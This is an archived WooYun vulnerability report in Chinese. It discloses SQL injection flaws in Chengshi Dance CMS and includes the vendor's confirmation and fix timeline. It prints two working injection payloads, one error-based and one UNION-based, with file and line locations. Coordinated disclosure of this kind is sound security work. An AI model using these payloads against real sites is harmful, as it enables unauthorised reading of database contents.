漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-051255
漏洞标题:程氏舞曲CMS最新php版本多处sql注入漏洞
相关厂商:chshcms.com
漏洞作者: 寂寞的瘦子
提交时间:2014-02-18 11:41
修复时间:2014-05-19 11:42
公开时间:2014-05-19 11:42
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-02-18: 细节已通知厂商并且等待厂商处理中
2014-02-18: 厂商已经确认,细节仅向厂商公开
2014-02-21: 细节向第三方安全合作伙伴开放
2014-04-14: 细节向核心白帽子及相关领域专家公开
2014-04-24: 细节向普通白帽子公开
2014-05-04: 细节向实习白帽子公开
2014-05-19: 细节向公众公开
简要描述:
操蛋捏。
详细说明:
昨天刚下载的,2.16号更新的版本。
第一处在管理后台:https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/app/controllers/admin/news.php第66行
请求url:http://127.0.0.1/cmshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/index.php/admin/dance/so/?key=1' AND (SELECT 5960 FROM(SELECT COUNT(*),CONCAT((select user()),(SELECT (CASE WHEN (5960=5960) THEN 1 ELSE 0 END)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)%23
利用显错读取信息。
还有一处在前台:https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/app/controllers/singer.php第127行
跟踪变量同一文件165行 :
漏洞证明:
第二处没法根据显错读取信息,sql语句不过关...
但是可以使用union读取字段等信息(附上payload:http://127.0.0.1/cmshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/index.php/vod/so/key/%25%27%20union%20select%201%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%23)
返回正确,表示有39个字段
修复方案:
早知道不一起合并了,样式估计要乱了。。。
ps:还有几处类似的文件存在bug,请排查
版权声明:转载请注明来源 寂寞的瘦子@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-02-18 16:11
厂商回复:
感谢你的提醒
已经修复!
最新状态:
暂无